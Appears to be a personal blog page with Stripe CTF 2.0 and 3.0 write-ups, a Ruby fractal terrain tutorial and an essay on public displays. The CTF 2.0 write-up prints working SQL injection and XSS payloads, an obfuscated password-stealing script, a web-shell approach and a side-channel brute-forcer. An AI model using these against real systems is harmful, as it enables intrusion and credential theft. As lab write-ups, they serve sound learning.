Articles

# Stripe CTF 3.0

Sadly, level 3 would not run for me, even with Stripe's patch, so I could not continue with the competition. It was fun while it lasted though.

Wednesday saw the beginning of another Stripe CTF! This time I was in London when it started so I went to the launch meeting with some old uni friends.

The theme this time was distributed computation, so with a tiny netbook, I dove in to the levels.

## Level 0

Level 0 was essentially an exercise in optimisation. A given text input was checked against a list of words. If an input word was in the preset dictionary, it had to be tagged. The preset dictionary was an ordered list, and as such was O(n) to search. By applying the following:

```
index 1558f2d..d07273f 100644
--- orig.rb
+++ mod.rb
@@ -1,4 +1,5 @@
 #!/usr/bin/env ruby
+require 'set'
 
 # Our test cases will always use the same dictionary file (with SHA1
 # 6b898d7c48630be05b72b3ae07c5be6617f90d8e). Running `test/harness`
@@ -7,6 +8,7 @@
 
 path = ARGV.length > 0 ? ARGV[0] : '/usr/share/dict/words'
+entries = Set.new(entries)
 
 output = contents.gsub(/[^ \n]+/) do |word|
```

The list is turned into a set with an O(1) lookup time, significantly speeding up the operation.
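The difference is easy to demonstrate in isolation, independent of the Ruby code above; here is a small Python sketch comparing list and set membership tests:

```python
import timeit

# Build a dictionary-like word list, then a set from it (one-time O(n) cost)
words = [f"word{i}" for i in range(100_000)]
word_set = set(words)

# Membership tests: O(n) linear scan for the list, O(1) hash lookup for the set
list_time = timeit.timeit(lambda: "word99999" in words, number=100)
set_time = timeit.timeit(lambda: "word99999" in word_set, number=100)

print(set_time < list_time)  # the set lookup wins by orders of magnitude
```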

## Level 1

This level was about cryptocurrencies, and to pass it you had to mine a … 'GitCoin'. Essentially, you were given a repo with an initial catalog of transactions, and you had to successfully submit a transaction which gave your given user a GitCoin.

Proof of work for a GitCoin was determined by ensuring that the git commit had a SHA1 hash lexicographically smaller than the difficulty. So you add a nonce to your commit message and keep cycling through random values until the commit hashes to a valid signature.

Stripe provided a very slow bash reference implementation, which I still used to pass the level. Instead of incrementing the nonce in bash, though, I wrote a Python script to find a correct hash for me faster.

```
import sys
import random
import string
import threading
from hashlib import sha1
import Queue as queue  # Python 2

def work(diff, tree, parent, timestamp, q):
    diffl = len(diff)
    # The hash only needs to start with this many zeros to beat the difficulty
    target = ''.join('0' for x in range(diffl))
    body = ("tree %s\nparent %s\n"
            "author CTF user <me@example.com> %s +0000\n"
            "committer CTF user <me@example.com> %s +0000\n\n"
            "Give me a Gitcoin\n\nnonce: ") % (tree, parent, timestamp, timestamp)
    while True:
        body_b = '%s%s' % (body, ''.join(random.choice(string.hexdigits) for x in range(8)))
        # git prepends "commit <length>\0" before hashing
        s = sha1('commit ' + str(len(body_b)) + '\0' + body_b)
        hex = s.hexdigest()[:diffl]
        if hex.startswith(target):
            body = body_b
            break
    q.put(body)

def main():
    diff, tree, parent, timestamp = sys.argv[1:]
    q = queue.Queue()
    th = threading.Thread(target=work, args=(diff, tree, parent, timestamp, q))
    th.daemon = True
    th.start()

    body = bytes(q.get())
    with open('/home/carl/level1/test.txt', 'w') as f:
        f.write(body)

    th.join(0)

if __name__ == '__main__':
    main()
```

There were some hurdles I came across while solving this, which show in the code. The git hashing command `git hash-object -t commit` didn't just take the SHA1 hash of its input; it would first prepend `commit len(data)` (plus a null byte) before hashing. This was easy enough to find with a bit of searching, but a major issue was that I couldn't replicate the SHA1 hash unless I first wrote the commit to a file, rather than streaming via stdin. So I just wrote to a file and modified the miner bash script to change:

```
@@ -56,12 +56,12 @@ $counter"
 
         # See http://git-scm.com/book/en/Git-Internals-Git-Objects for
         # details on Git objects.
-        sha1=$(git hash-object -t commit --stdin <<< "$body")
+        sha1=$(git hash-object -t commit /home/carl/level1/test.txt)
 
         if [ "$sha1" "<" "$difficulty" ]; then
             echo
             echo "Mined a Gitcoin with commit: $sha1"
-            git hash-object -t commit --stdin -w <<< "$body" > /dev/null
+            git hash-object -t commit -w /home/carl/level1/test.txt > /dev/null
             git reset --hard "$sha1" > /dev/null
             break
         fi
```

Which let me get the correct hashes and mine the coin.
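For reference, the header git prepends is simple to reproduce; this sketch hashes bytes the way `git hash-object` does, checked against git's well-known blob hash for `"hello\n"`:

```python
from hashlib import sha1

def git_object_hash(obj_type, data):
    """Hash bytes the way `git hash-object` does: "<type> <size>\\0" + body."""
    header = b"%s %d\0" % (obj_type, len(data))
    return sha1(header + data).hexdigest()

# Sanity check: `echo "hello" | git hash-object --stdin` gives this hash
print(git_object_hash(b"blob", b"hello\n"))
# ce013625030ba8dba906f756967f9e9ca394464a
```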

## Level 2

Level 2 was all about DDoS attacks. The idea was that there were a number of back-end servers, a reverse proxy (which you modified), and a number of clients, some malicious and others not. You had to modify the reverse proxy (called shield) so as not to let malicious traffic through, and to attempt to minimise back-end idleness. Scores were determined by a test harness and also on the git push hook.

Stripe provided the attack code for reference, which made the level really easy. Malicious attackers basically spawned more connections more often, and the numbers they spawned were defined in the file as:

```
simulationParameters = {
  'roundLength': 500, // In ms
  'roundCount': 40,
  'clientsPerRound': 5,
  'pElephant': 0.4,
  'mouseRequestsPerRound': 2,
  'elephantRequestsPerRound': 50,
  'backendCount': 2,
  'backendInFlight': 2,
  'backendProcessingTime': 75
};
```

From this you can see that malicious clients ("elephants") send 50 requests per round, and normal clients ("mice") send 2. So my first solution was just to limit the number of connections from each client with a simple counter. My implementation looks like:

```
diff --git a/shield b/shield
index c67bd68..8ba87f2 100755
--- a/shield
+++ b/shield
@@ -7,6 +7,7 @@ var httpProxy = require('./network_simulation/lib/proxy');
 var checkServer = require('./network_simulation/lib/check_server');
 var nopt = require('nopt');
 var url = require('url');
+var rcount = {};
 
 var RequestData = function (request, response, buffer) {
   this.request = request;
@@ -14,6 +15,16 @@ var RequestData = function (request, response, buffer) {
   this.buffer = buffer;
 };
 
+function checkRequest(ip) {
+  if (rcount[ip] === undefined) {
+    rcount[ip] = 1;
+  } else {
+    rcount[ip]++;
+  }
+  return rcount[ip] <= 4;
+}
+
 function ipFromRequest(reqData) {
 }
@@ -29,10 +40,10 @@ var Queue = function (proxies, parameters) {
 };
 Queue.prototype.takeRequest = function (reqData) {
   // Reject traffic as necessary:
-  // if (currently_blacklisted(ipFromRequest(reqData))) {
-  //   rejectRequest(reqData);
-  //   return;
-  // }
+  if (!checkRequest(ipFromRequest(reqData))) {
+    rejectRequest(reqData);
+    return;
+  }
   // Otherwise proxy it through:
   this.proxies[0].proxyRequest(reqData.request, reqData.response, reqData.buffer);
 };
```

I committed and pushed, and surprisingly, this gave me a passing score!
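The same counter idea in isolation, as a Python sketch (the threshold of 4 is the one from my shield patch; per-round resets are omitted, just as they were in the real fix):

```python
from collections import defaultdict

MAX_REQUESTS = 4  # mice send ~2 requests per round, elephants ~50

request_counts = defaultdict(int)

def check_request(ip):
    """Allow a request only while the per-IP count stays under the cap."""
    request_counts[ip] += 1
    return request_counts[ip] <= MAX_REQUESTS

# A "mouse" (2 requests) gets through; an "elephant" (50) is mostly rejected
mouse = [check_request("10.0.0.1") for _ in range(2)]
elephant = [check_request("10.0.0.2") for _ in range(50)]

print(all(mouse))      # True
print(sum(elephant))   # 4 allowed, the remaining 46 rejected
```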

## Level 3

This is where the story gets sad. I checked out the code, and I could not get the ./test/harness to work correctly. The task was a file indexing service which had to be optimised. It was written in Scala, which I have never used, so I could not work out how to debug it. Stripe released a fix, but it still did not solve my issues. At that point I had to move on to other things and could not complete the CTF.

# A Fractal Height Map Generator in Ruby

[I’m migrating my old articles to the blog in order to switch to it entirely]

Date: 25th March 2010

## Introduction

This article describes the theory behind, and how to implement, a basic fractal height map generator. It is based upon the algorithm defined at http://gameprogrammer.com/fractal.html. Height maps are used in many things: positioning software, graphical rendering, and procedural map generation. Given the right conditions, height maps can be used to create visually stunning images, and are frequently used with an alpha channel to simulate clouds.

All source code used in this article shall be made freely available, under a Creative Commons GPL Licence.

The implementation which will be defined here outputs an array of numbers, which on the surface seems fairly mundane. However, with a bit of tweaking with VT100 colour codes, or passing to an image generation program, the algorithm can produce outputs such as this:

The ASCII renderer assigns a colour code to a range of numbers and then depending on your ranges, you can create rainbow-like maps like the one above. The grey scale and transparent images had their number arrays passed to an image generation program called RMagick.

## The Theory

I will go through the basic idea again as it was defined in the gameprogrammer link, to keep consistency with the terms used further in the article. So before we get on to the diamond-square algorithm, I shall implement the simpler 1 dimensional algorithm, which will describe the height of a line, similar to a horizon. The patterns created show some fractal behaviour, in that they are said to be self-similar. An object is said to be self-similar when magnified subsets of the object look like, or are identical to, the whole and to each other[1].

In the context of this algorithm, it means that as we add more detail, the rough, major features will still hold true, but more detail will become apparent as we look closer. This makes the algorithm ideal for recursive or iterative methods. This implementation uses an iterative method.

### Midpoint Displacement in One Dimension

For the creation of the 1 dimensional height map, similar to a horizon, a very simple algorithm is used:

```
def generateLine(length)

  # Due to this algorithm being simple for
  # the article's sake, length should be
  # constrained to the powers of 2.
  #
  # As we need a midpoint, however, length
  # should be defined as (2^n)+1.

  # Create an array which describes a line.
  # Set the default values to 0.
  line = Array.new(length, 0)

  # Define the range of the terrain values.
  # For this example we shall take the range
  # of values to be -63 to 63, with the midpoint
  # at 0, our default value.
  # Range is then 128.
  range = 128

  # Work out the number of line segment
  # levels there are in the line. As each line
  # segment level is defined by dividing by two
  # until length is 1, the number of segments
  # is the log_2 of the length.
  noSegments = Math.log(length - 1, 2)

  # Iterate through the levels
  (1 .. noSegments).each { |level|

    # Work out the line segment length so you
    # can properly address the offset.
    segLength = (length / 2**level)

    # Work out the number of line segments
    # within this level
    noSegL = (2**level) - 1

    # Iterate through the line segments
    (1 .. noSegL).each { |segOffset|

      # If value is not zero, skip over it; it was done
      # on a previous level
      if line[segLength * segOffset] == 0

        # Make sure the current value of the line
        # is directly midway between its two parents.
        line[segLength * segOffset] = (line[segLength * (segOffset - 1)] + line[segLength * (segOffset + 1)]) / 2

        # Apply random function to value
        line[segLength * segOffset] = randomFunction(line[segLength * segOffset], level, range)

      end
    }
  }

  return line
end
```

Now, as you can see, the most important part of that algorithm is the one I have purposely omitted: randomFunction. This is where you, quite obviously, define how you want your heights distributed. A good way is to simply use a bounded random function, where the bounds are defined by the line segment level you are currently within. For example, a function like:

```
def randomFunction(value, level, range)

  # Roughness constant 0 < h < 1.
  # As h approaches 0, the level-dependent
  # bounds grow and tend to 1 for all values
  # of level.
  h = 0.8

  # Define bounds in terms of level and a roughness
  # function
  multiplier = 2 ** (-h * level - 1)

  # Perform random function, bound it, and then apply
  # multiplier
  value += (rand() * range - (range / 2)) * multiplier

  # Return
  return value
end
```

Would offset the value of the line by a random amount bounded by a function of the line segment level and a roughness coefficient. As this function is the heart of this algorithm and of the 2 dimensional algorithm, I will go into some detail on the use of the roughness coefficient. If the roughness coefficient is set to 1, then the multiplier acts the same as $2^{-l-1},\ 0 < l < \infty,\ l \in \mathbb{Z}^+$. Decreasing the value of h flattens out the function, meaning the bounds are less constrictive and allowing for much rougher terrain. Here is a plot of the multiplier when h=0.8 and h=0.2, and a plot of the generated lines when those constraints are used. The x axis is equal to the line segment level.

[gallery columns="2" ids="434,433"]

As you can see, the roughness coefficient makes a massive difference to the outputted numbers. For those interested in recreating the plot, I piped the output of the above code into a text file, and then used GNUPlot to make the images.
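A quick numeric check of the multiplier (the values below are just the formula evaluated, not read off the plots):

```python
def multiplier(h, level):
    """Level-dependent bound multiplier: 2^(-h*level - 1)."""
    return 2 ** (-h * level - 1)

# With h = 1 the multiplier reduces to 2^(-level-1)
print(multiplier(1, 1))  # 0.25
print(multiplier(1, 2))  # 0.125

# A smaller h keeps the bounds wider at deeper levels, giving rougher terrain
print(multiplier(0.2, 5), ">", multiplier(0.8, 5))
```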

### Extending into 2 dimensions - The diamond square algorithm

To extend this algorithm into the second dimension, we have to imagine the terrain data as a two dimensional array of numbers. Each number represents a height in this two dimensional field, and so each column and row can be treated similarly to above.

To split up a two dimensional array in a self-similar way we must use squares, or diamonds, which are analogous to the line segments of the 1 dimensional algorithm. Then, rather than using the ends of a line segment to work out a base height, the corners of the square, or diamond, are used. For example:

[gallery columns="2" ids="436,435"]

Like the line segment algorithm, the mathematical 'meat' is the same random function as before. The complexity comes in managing which indexes are part of a diamond or a square. So, for example, here is a code segment which works out indexes of a square, depending on level and location, and applies the random function:

```
# Get the corners of an arbitrary square and perform operation
# on center.
#
# @param array Array to use
# @param topleftIndexX X index of top left of square
# @param topleftIndexY Y index of top left of square
# @param length Length of the square
# @param level Level into the calculation
def processSquare(array, topleftIndexX, topleftIndexY, length, level, range, h)

  # Get coordinates of the corners of the square
  toprightIndexX = topleftIndexX
  toprightIndexY = topleftIndexY + length + ((level == 0) ? -1 : 0)
  bottomleftIndexX = topleftIndexX + length + ((level == 0) ? -1 : 0)
  bottomleftIndexY = topleftIndexY
  bottomrightIndexX = topleftIndexX + length + ((level == 0) ? -1 : 0)
  bottomrightIndexY = topleftIndexY + length + ((level == 0) ? -1 : 0)
  middleX = topleftIndexX + length / 2
  middleY = topleftIndexY + length / 2

  # Get values
  topleftValue = array[topleftIndexX][topleftIndexY]
  toprightValue = array[toprightIndexX][toprightIndexY]
  bottomleftValue = array[bottomleftIndexX][bottomleftIndexY]
  bottomrightValue = array[bottomrightIndexX][bottomrightIndexY]

  # Get average
  average = (topleftValue + toprightValue + bottomleftValue + bottomrightValue) / 4

  # Set new value
  array[middleX][middleY] = average + calculateOffset(level, range, h)
end
```

Where calculateOffset is the random function in this application. The diamond calculation algorithm is very similar and looks like this:

```
# Get the edges of an arbitrary diamond and perform operation
# on center.
#
# @param array Array to use
# @param topIndexX X index of top of diamond
# @param topIndexY Y index of top of diamond
# @param arraylength Length of the array
# @param level Level into the calculation
def processDiamond(array, topIndexX, topIndexY, arraylength, level, range, h)

  # Adjust
  arraylength -= 1
  length = arraylength / (2 ** level)

  # Get coordinates of the diamond
  rightIndexX = topIndexX + length / 2
  rightIndexY = (topIndexY == length) ? length / 2 : topIndexY + length / 2
  leftIndexX = topIndexX + length / 2
  leftIndexY = (topIndexY == 0) ? arraylength - length / 2 : topIndexY - length / 2
  bottomIndexX = (topIndexX + length / 2 == arraylength) ? length / 2 : topIndexX + length
  bottomIndexY = topIndexY
  middleX = topIndexX + length / 2
  middleY = topIndexY

  # Get values
  topValue = array[topIndexX][topIndexY]
  rightValue = array[rightIndexX][rightIndexY]
  bottomValue = array[bottomIndexX][bottomIndexY]
  leftValue = array[leftIndexX][leftIndexY]

  # Get average
  average = (topValue + rightValue + bottomValue + leftValue) / 4

  # Set new value
  array[middleX][middleY] = average + calculateOffset(level, range, h)

  # Wraps
  if middleX == arraylength
    array[0][middleY] = array[middleX][middleY]
  end
  if middleY == 0
    array[middleX][arraylength] = array[middleX][middleY]
  end
end
```

The only difference with the above snippet is the different indices it retrieves, and that it must handle wrap around for some of the edges.

So currently, we can create arbitrary diamonds and squares within a 2-dimensional array and assign a fuzzy average of the edges according to the h value. Now all we need is some code to manage traversing through the levels of iterations and through the diamonds and squares themselves. Here is my solution:

```
# The main control loop for the algorithm.
#
# @param lengthExp Length exponent
# @param range Value range
# @param h Roughness constant
def generateTerrain(lengthExp, range, h)
  length = (2 ** lengthExp) + 1
  array = Array.new
  array = createArray(array, length)

  # Go through levels (iterative recursion)
  (0 .. lengthExp - 1).each { |level|

    # Iterator for the square part of the algorithm.
    # Will go through the x-axis coords
    (0 .. (2 ** level) - 1).each { |sqx|
      # Y axis coords
      (0 .. (2 ** level) - 1).each { |sqy|
        gap = length / 2 ** level
        x = (0 + (gap * sqx))
        y = (0 + (gap * sqy))
        processSquare(array, x, y, gap, level, range, h)
      }
    }

    # Iterator for the diamond part of the algorithm
    (0 ... (2 ** (level + 1))).each { |dix|
      # Offset in the number of points on the y-axis. Dependent
      # on if x iteration is even or odd.
      offset = (dix.even?) ? 1 : 2
      (0 ... (2 ** (level + 1) / 2)).each { |diy|
        gap = (length / 2 ** (level + 1))
        ygap = 2 * gap
        x = (0 + (gap * dix))
        if (dix.even?)
          y = 0 + (ygap * diy)
        else
          y = gap + (ygap * diy)
        end
        processDiamond(array, x, y, length, level, range, h)
      }
    }
  }

  return array
end
```

And this gives us our array with its height map hidden inside. Using a library like RMagick we can output images like the ones shown above. To create the gray scale image, the following code was used:

```
image = Image.new(array.length, array.length)

(0 ... array.length).each { |x|
  (0 ... array[x].length).each { |y|
    val = array[x][y] * (2**9)
    # Create greyscale image
    image.pixel_color(x, y, Pixel.new(val, val, val, val))
  }
}

image.display
```

Which just takes the value in the array and multiplies it by 512, giving the values a range of $0 \le v \le 2^{15},\ \frac{v}{512} \in \mathbb{Z}$. This gives us the gaseous image that has been generated above.

## Code Listings

A library version of the ruby code found in this tutorial can be found at GitHub.

## References

1. Voss, Richard F., "Fractals in Nature: Characterization, Measurement, and Simulation", SIGGRAPH 1987

Based on a work at gameprogrammer.com.

# Stripe-CTF 2.0

I managed to finish the Stripe CTF with 18 hours to spare and placed no. 702. I’m pretty happy with the result considering how little time I actually spent on it! My progress can be found here and you can see when I took days off!

Overall the competition was really enjoyable and the final hangout in the irc channel while my program was breaking the flag really made me feel part of the community.

I won’t publish this until the end of the deadline, but I’ll try to remember how I broke through each level and give the code I used:

### Level 0

Very simple! A beginner SQL injection attack which leveraged the following line in the code:

```var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
db.all(query, namespace, function(err, secrets) {
...```

This essentially put namespace into the '?' of the statement. By setting namespace to a wildcard ('%'), the page dumped its data and the password to the next level.
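The behaviour is easy to reproduce with an in-memory database (the table and rows here are made up for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE secrets (key TEXT, secret TEXT)")
conn.executemany("INSERT INTO secrets VALUES (?, ?)",
                 [("alice.password", "hunter2"), ("bob.password", "letmein")])

query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"'

# Intended use: only your own namespace comes back
mine = conn.execute(query, ("alice",)).fetchall()

# Passing the LIKE wildcard "%" as the namespace matches every key
everything = conn.execute(query, ("%",)).fetchall()
print(len(mine), len(everything))
```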

### Level 1

The task for this level was to guess a combination that was defined in a hidden file (“combination.txt” or similar) which would then unlock “password.txt” and output to a web page. The code which read in the combination looked like:

```
extract($_GET);
if (isset($attempt)) {
    $combination = trim(file_get_contents($filename));
    if ($attempt === $combination) {
...
```

The key thing I could exploit here was `extract($_GET)`, which just created variables for whatever was in the GET params with no checks. Simply passing "&filename=&attempt=" as params got me past the if statement and the password was outputted.

### Level 2

This level was referred back to again and again, as you could upload files to it and execute code from a level02-*.stripe-ctf.com domain. The idea was to get the contents of the file password.txt, which was not accessible from the webserver. Uploading a .php file which read the contents of the file and echoed it worked by just browsing to "/uploads/getfile.php".

### Level 3

This was the first level which was hard! I’d never really done a proper SQL injection before and it was quite satisfying to get working. The SQL injection point was:

```query = """SELECT id, password_hash, salt FROM users

which meant that I was stuck with the start of the statement regardless, and the python-sql link didn’t allow multiple statements. I read up on SQL attacks and ended up using a combination of UNION and SELECT AS in order to inject my own data into the response. However, the only thing I could inject was an id, password_hash, and a salt. The id allowed me to spoof a user, and I could determine what my hash should be given a known salt. My injection was

`' union select 1 as 'id', '961b6dd3ede3cb8ecbaacbd68de040cd78eb2ed5889130cceb4c49268ea4d506' as 'password_hash', 'a' as salt ; --`

Which made the proper request to the database return nothing, combined with my own data: an id of 1, the SHA256 hash of "aa", and a salt of "a".

Putting the above in the username field and setting my password to 'a', I got authenticated. Then I just changed the id between 1-3 until I got the correct user.
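The spoofed hash is just the application's salted-hash check run in reverse; assuming the server computes SHA256(password + salt), the injected value falls out directly:

```python
from hashlib import sha256

password = "a"  # the password I typed into the login form
salt = "a"      # the salt I injected via the UNION

# The hash the server computes and compares against the injected password_hash
password_hash = sha256((password + salt).encode()).hexdigest()
print(password_hash)
# 961b6dd3ede3cb8ecbaacbd68de040cd78eb2ed5889130cceb4c49268ea4d506
```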

N.B. The secrets for the other users, which claimed to be the solution to P=NP and a plan for a perpetual motion device, seemed to be generated from SCIgen.

### Level 4

This level was weird: a JavaScript injection attack. The given website had a simple concept: users passed karma between each other. However, to show that you really trusted the user you were giving karma to, your password was shown to anyone you gave karma. There was a system-generated user called 'karma_fountain' whose password was the code to unlock the next level.

The injection route was: set your password to some JavaScript, send karma to your prey, and when they log on the JavaScript executes. Luckily, karma_fountain logged in every minute, and my password was set to (wrapped in script tags):

`$.post('/user-izwsyuhfyt/transfer', { to: "karma", amount: "1"});`

### Level 5

This was black magic. It was solved near accidentally and then inspected to work out why.

Essentially you had to trick the system to think that it was receiving a command which solved the regex:

`/[^\w]AUTHENTICATED[^\w]*$/`

However, the response had to come from a stripe-ctf domain, and to get the code the system had to think it came from a level05.stripe-ctf domain.

Using level 2, I uploaded a .php file (.txt was forbidden by the webserver rules) which just echoed " AUTHENTICATED", and passing its address got me authenticated as a level02 domain. Now all I needed was to get it to authenticate as level05.
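The regex is easy to sanity-check; Python's `re` syntax is close enough to the original here to show why a leading space matters:

```python
import re

pattern = re.compile(r'[^\w]AUTHENTICATED[^\w]*$')

# A leading space satisfies [^\w]; trailing non-word characters are allowed
print(bool(pattern.search(" AUTHENTICATED")))      # True
print(bool(pattern.search(" AUTHENTICATED :)")))   # True

# No non-word character before the token, or word characters after, fail
print(bool(pattern.search("AUTHENTICATED")))       # False
print(bool(pattern.search(" AUTHENTICATED ok")))   # False
```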

In the end, the URL I gave it was itself, with the POST parameters it needed for level 2 in the GET params. Essentially this is what happened:

1. Level5 posted to itself with a domain of level5.* and get params for level2 auth
2. From this post the level2 auth were collected by the post param get functions
3. Authed as level2
4. Authed as level5

BLACK MAGIC

### Level 6

This level was incredibly fiddly, but Firebug really helped with it. Essentially it was a blogging site, and there was an injection point in the blogroll. However, the database had a "safeInsert" method which dropped any data containing an apostrophe or quote. This just made it awkward.

The site had a "/user_info" page where a user could view their unsanitized username and password. The user I needed the password from apparently had quotes and apostrophes in its password, so I also needed to sanitize them before getting them out of the system. The only way to do that would be to make my prey post their own password.

So the exploit work flow is:

1. GET /user_info
2. Strip password and convert to character code
3. POST this to /ajax/posts with a scraped ‘_csrf’ token to authenticate

This had to be done with no quotes or apostrophes so any strings were generated using String.fromCharCode(). Here’s the formatted exploit code I used:

```
$.get(String.fromCharCode(117,115,101,114,95,105,110,102,111),
  function(response) {
    var a = $(String.fromCharCode(60,100,105,118,47,62)).html(response).find(String.fromCharCode(46,115,112,97,110,49,50,32,116,100)).text();
    var u = "";
    for (i = 0; i < a.length; i++) { u += String.fromCharCode(32) + a.charCodeAt(i); }
    $.post(String.fromCharCode(97,106,97,120,47,112,111,115,116,115),
      {
        title: String.fromCharCode(88,83,83),
        body: u,
        _csrf: $(String.fromCharCode(102,111,114,109,35,110,101,119,95,112,111,115,116,32,105,110,112,117,116))[0].value
      });
  }
);
```
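Decoding those char-code sequences shows what the exploit actually touches; a quick check (Python, for brevity):

```python
def decode(codes):
    """Equivalent of JavaScript's String.fromCharCode over a list of codes."""
    return "".join(chr(c) for c in codes)

print(decode([117, 115, 101, 114, 95, 105, 110, 102, 111]))    # user_info
print(decode([97, 106, 97, 120, 47, 112, 111, 115, 116, 115])) # ajax/posts
print(decode([88, 83, 83]))                                    # XSS
print(decode([60, 100, 105, 118, 47, 62]))                     # <div/>
```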

### Level 7

I was given an API to a “WaffleCopter” service and had to request a premium waffle in order to get the password. I was not a premium user. Each request was signed with a SHA1 hash. They could be replayed.

After googling for SHA1 vulnerabilities and hanging around in the channel, I discovered that there was a length-extension (padding) vulnerability in SHA1, and that there was a handy Python script which would do all the work for you.

Combining this tool with a web request, I was able to take an old request from user 2, who had ordered a "dream" premium waffle, add "&waffle=leige" to the end of the query, and the magic Python script worked out padding that produced a valid signature for the modified request!

### Level 8

This was incredible and a nice mix of frustrating, hard, and madness.

Essentially: the flag was a 12 digit number, kept by a program which split the password into 4 chunks held by separate instances. You interrogated the main instance of the PasswordDB and it would ask the chunk servers if it was correct. The service would then reply {success: false/true}. You could also pass it a "webhook" which would receive the results rather than the curl/browser call.

The server also only accepted data from a *.stripe-ctf.com domain.

So, first problem: I needed to get that password. The chunking was an advantage, as brute forcing individual chunks only needs a 10^3 search space 4 times, rather than one 10^12 search space. This made brute forcing practical. While on a local instance of the server I could interrogate the chunk servers individually, on the level8 server I did not have that option, so I needed to go through the primary server.

Due to reflection magic, when a webhook is used and a chunk server says a password chunk is wrong, it directly tells the webhook true/false. And the port used is dependent upon which chunk is replying! A port difference (from the port of your last request) of 2 meant chunk 1 had rejected your password, 3 meant chunk 2, and so on.

This gave a side channel style attack where you could sequentially increase each chunk depending on which chunk returned false. This meant you could break the flag in <= 4000 requests. Ace.
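A simulation of the search strategy (no networking here; a "first wrong chunk" oracle stands in for the port-difference side channel):

```python
def crack(secret):
    """Sequentially fix each 3-digit chunk, guided by which chunk rejects."""
    chunks = [int(secret[i:i + 3]) for i in range(0, 12, 3)]
    guess = [0, 0, 0, 0]
    attempts = 0
    while True:
        attempts += 1
        # The port difference reveals the first chunk that rejected the guess
        wrong = next((i for i, (g, s) in enumerate(zip(guess, chunks)) if g != s), None)
        if wrong is None:
            return guess, attempts  # the server replied {success: true}
        guess[wrong] += 1

guess, attempts = crack("123456789012")
print(attempts)  # 1381 requests, comfortably under 4000
```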

So, the second problem: getting access to a .stripe-ctf.com domain. The problem statement said that sshd was running. Attempting to ssh in with your generated username failed due to no public key. Hmm. Uploading a PHP script with a simple form and a shell_exec command essentially gave me a poor man's command line, and after much faffing I was able to upload a public key, create a .ssh/ folder, and add my key to an authorized_keys file. Then I was in.

Running my cracker on the production server turned up some problems: the port differences were sometimes more than 5. I assume this was because of the number of people on the server. I modified the program to ignore any weird port differences and keep trying until a sane one was found. The server was also INCREDIBLY SLOW. It took me about 3 and a half hours to brute force my flag with the following:

```
require 'socket'
require 'net/https'
require 'json'

ENDPOINT = "https://level08-4.stripe-ctf.com/user-ianrhgpijr/"
WEBHOOK = "level02-3.stripe-ctf.com"

# current port and chunk values
last_port = -1
chunk1 = 0
chunk2 = 0
chunk3 = 0
chunk4 = 0

# Open webhook port
server = TCPServer.open(50001)
puts "[Server]:: listening on port #{server.addr[1]}"

# Until finished (practically forever on production)
while true

  # Start POST request to endpoint
  uri = URI(ENDPOINT)
  req = Net::HTTP::Post.new(uri.to_s)

  # Pad out to chunks of 3, with zeros
  password_chunk = "#{chunk1.to_s.rjust(3, '0')}#{chunk2.to_s.rjust(3, '0')}#{chunk3.to_s.rjust(3, '0')}#{chunk4.to_s.rjust(3, '0')}"

  # Build request with the guess and our webhook (JSON, as the level8 API expected)
  req.body = JSON.generate({ "password" => password_chunk,
                             "webhooks" => ["#{WEBHOOK}:50001"] })

  http = Net::HTTP.new(uri.host, Net::HTTP.https_default_port)
  http.use_ssl = true

  # Send request, we only really care about the response when it returns true
  http.start { |h| @response = h.request(req) }

  # Wait on webhook
  client = server.accept
  port = client.peeraddr[1]

  if (last_port != -1)

    # Get port difference
    diff = port - last_port

    # Verbose is good on dodgy production server
    puts "[CHUNK]:: #{password_chunk} & port_diff = #{diff}"

    # Increment chunks based on port difference
    if (diff == 2)
      chunk1 += 1
    elsif (diff == 3)
      chunk2 += 1
    elsif (diff == 4)
      chunk3 += 1
    elsif (diff == 5)
      chunk4 += 1
      # Last chunk, we can start checking the flag result!
      if (@response.body.include?('true'))
        # Woo got the flag
        break
      end
    end
  end

  last_port = port
  client.close
end
```

### Conclusions

All in all it was a brilliant competition to spend hours in distraction with. Looking forward to the next one (and my free t-shirt).

# Big displays and tabletops – the wrong approach?

## The current model

Current research trends are in favour of large public displays, hidden projectors, and table top displays – Microsoft’s Surface being a prominent example along with the many research projects involving public displays.

A lot of these projects have options for multiple users operating the systems, in fact some are made only for collaboration in the workplace (Highwire’s CoffeeTable, and Intel’s What Do You Bring To the Table?). However, when systems are in a public setting, the use becomes more of a public service than a means for collaboration and when the users are acting independently great efforts are made to determine identity and facilitate independent interaction and data presentation.

The classic example of this is where you walk up to a public display in a university and the display shows your time-table.

In the above scenario, what happens when a display is surrounded by more than one person, say 5 people? Does it show 5 individual timetables? If 50 people approach the display, does it show 50 timetables? That is impractical, so what is a fair way to present a crowd's worth of information to a waiting crowd? It could be shown one at a time, but then who gets to see theirs first, and more importantly, how does one recognise one's own timetable if one can't remember it in the first place? Does your name have to appear with the timetable? Will public users be comfortable with this scenario? What authentication methods are used for systems such as these, do users need to opt in, and will these questions have the same answers for different displays?

If we ignore every issue except authentication, how does the display know who you are in order to show the relevant information? Does it read a unique ID from your phone, a smart card, or some other wireless device? How does this deal with phones being sold, or smart cards being lost? What happens if someone of a criminal nature got hold of a young student's ID card and started stalking the student? Is there a line for how public information must be before it can appear on a public display? Even if the display is not in a completely public setting, say it is behind the security checkpoint in a company, who decides how much information is displayed on a screen: the user, or the programmer in charge of the presentation software? If authentication is required before information is shown, does this not ruin the workflow of the display, and would it not also deter frantic late users from approaching the system?

With privacy being a current issue within society, do public displays not get relegated to glorified billboards, with the only personal information they are allowed to show being that which could be found on the public page of a person? Will the only use of these systems be for when one has lost their phone and the display happens to be free?

Currently, I believe the only real value of these systems will come from location-based advertising – where content changes based on the demographic of the people around it and the time of day.

## A different model

If we look into the future (something scientists are prone to doing), there is another model, which is where I believe public interactive displays should be tending.

By dissecting the mission of a public display it can be seen that it encompasses two functions.

1. Being a dedicated geographical point for a certain type of information or request,
2. Having a method to display feedback to the user.

If we look to the future and imagine a hypothetical piece of hardware exists, we can remove point 2 from the list of needed functions – and remove a lot of privacy issues.

We have this technology – albeit in a crude form – at the moment: the personal screen. Currently, these tend to be smartphones or similar devices. They tend to have authentication when switched on, via a passcode. They even support banking systems which – one would hope – worry about the security of the device in question.

